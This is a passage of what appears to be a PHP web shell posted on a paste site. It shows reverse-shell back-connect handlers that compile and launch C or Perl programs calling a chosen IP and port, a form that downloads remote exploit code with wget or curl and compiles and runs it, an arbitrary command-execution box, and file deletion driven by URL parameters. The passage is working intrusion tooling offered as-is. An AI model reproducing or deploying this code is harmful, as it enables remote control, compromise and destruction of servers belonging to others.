  3288.             { $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  3289.         else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } }
  3290.     elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
  3291.         {
  3292.         $ip = trim($_POST['ip']);
  3293.         $port = trim($_POST['backport']);
  3294.         tulis("bcc.c",$back_connect_c);
  3295.         exe("gcc -o bcc bcc.c");
  3296.         exe("chmod 777 bcc");
  3297.         @unlink("bcc.c");
  3298.         exe("./bcc ".$ip." ".$port." &");
  3299.         $msg = "Now script try connect to ".$ip." port ".$port." ...";
  3300.         }
  3301.     elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
  3302.         {
  3303.         $ip = trim($_POST['ip']);
  3304.         $port = trim($_POST['backport']);
  3305.         tulis_2("bcp",$back_connect);
  3306.         exe("chmod +x bcp");
  3307.         $p2=which("perl");
  3308.         exe($p2." bcp ".$ip." ".$port." &");
  3309.         sleep(1);
  3310.         $msg = "Now script try connect to ".$ip." port ".$port." ...";
  3311.         unlink("bcp");
  3312.         }
  3313.     elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
  3314.         {
  3315.         $pilihan = trim($_POST['pilihan']);
  3316.         $wurl = trim($_POST['wurl']);
  3317.         $namafile = download($pilihan,$wurl);
  3318.         if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; }
  3319.     ?>
  3320.     <table class="tabnet">
  3321.         <tr>
  3322.             <th>Port Binding</th>
  3323.             <th>Connect Back</th>
  3324.             <th>Load and Exploit</th>
  3325.         </tr>
  3326.         <tr>
  3327.             <td>
  3328.                 <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3329.                 <table>
  3330.                     <tr>
  3331.                         <td>Port</td>
  3332.                         <td>
  3333.                         <input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>">
  3334.                         </td>
  3335.                     </tr>
  3336.                     <tr>
  3337.                         <td>Password</td>
  3338.                         <td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td>
  3339.                     </tr>
  3340.                     <tr>
  3341.                         <td>Use</td>
  3342.                         <td style="text-align:justify">
  3343.                             <p>
  3344.                             <select class="inputz" size="1" name="use">
  3345.                                 <option value="Perl">Perl</option>
  3346.                                 <option value="C">C</option>
  3347.                             </select>
  3348.                             <input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px">
  3349.                         </td>
  3350.                     </tr>
  3351.                 </table>
  3352.                 </form>
  3353.             </td>
  3354.             <td>
  3355.                 <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3356.                 <table>
  3357.                     <tr>
  3358.                         <td>IP</td>
  3359.                         <td>
  3360.                         <input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>">
  3361.                         </td>
  3362.                     </tr>
  3363.                     <tr>
  3364.                         <td>Port</td>
  3365.                         <td>
  3366.                         <input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>">
  3367.                         </td>
  3368.                     </tr>
  3369.                     <tr>
  3370.                         <td>Use</td>
  3371.                         <td style="text-align:justify">
  3372.                             <p>
  3373.                             <select size="1" class="inputz" name="use">
  3374.                                 <option value="Perl">Perl</option>
  3375.                                 <option value="C">C</option>
  3376.                             </select>
  3377.                             <input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px">
  3378.                         </td>
  3379.                     </tr>
  3380.                 </table>
  3381.                 </form>
  3382.             </td>
  3383.             <td>
  3384.                 <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3385.                 <table>
  3386.                     <tr>
  3387.                         <td>url</td>
  3388.                         <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td>
  3389.                     </tr>
  3390.                     <tr>
  3391.                         <td>cmd</td>
  3392.                         <td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
  3393.                     </tr>
  3394.                     <tr>
  3395.                         <td>
  3396.                         <select size="1" class="inputz" name="pilihan">
  3397.                             <option value="wwget">wget</option>
  3398.                             <option value="wlynx">lynx</option>
  3399.                             <option value="wfread">fread</option>
  3400.                             <option value="wfetch">fetch</option>
  3401.                             <option value="wlinks">links</option>
  3402.                             <option value="wget">GET</option>
  3403.                             <option value="wcurl">curl</option>
  3404.                         </select>
  3405.                         </td>
  3406.                         <td colspan="2">
  3407.                             <input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;">
  3408.                         </td>
  3409.                     </tr>
  3410.                 </table>
  3411.                 </form>
  3412.             </td>
  3413.         </tr>
  3414.     </table>
  3415.     <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  3416. <?php }
  3417.  
  3418. elseif(isset($_GET['x']) && ($_GET['x'] == 'shell'))
  3419.     {
  3420.     ?>
  3421.     <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
  3422.         <table class="cmdbox">
  3423.             <tr>
  3424.                 <td colspan="2">
  3425.                 <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
  3426.                 </td>
  3427.             </tr>
  3428.             <tr>
  3429.                 <td colspan="2"><?php echo $prompt; ?>
  3430.                 <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" />
  3431.                 <input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" />
  3432.                 </td>
  3433.             </tr>
  3434.         </table>
  3435.     </form> <?php
  3436.     }
  3437. else
  3438.     {
  3439.     if(isset($_GET['delete']) && ($_GET['delete'] != ""))
  3440.         {
  3441.         $file = $_GET['delete']; @unlink($file);
  3442.         }
  3443.     elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != ""))
  3444.         {
  3445.         delete_option($_GET['fdelete']);
  3446.         }
  3447.     elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != ""))
  3448.         {
  3449.         $path = $pwd.$_GET['mkdir']; @mkdir($path);
  3450.         }
  3451.     $buff = showdir($pwd,$prompt);
  3452.     echo $buff;
  3453.     }
  3454.     ?>
  3455.    
  3456.         </div>
  3457.     </body>
  3458. </html>
Add Comment
Please, Sign In to add comment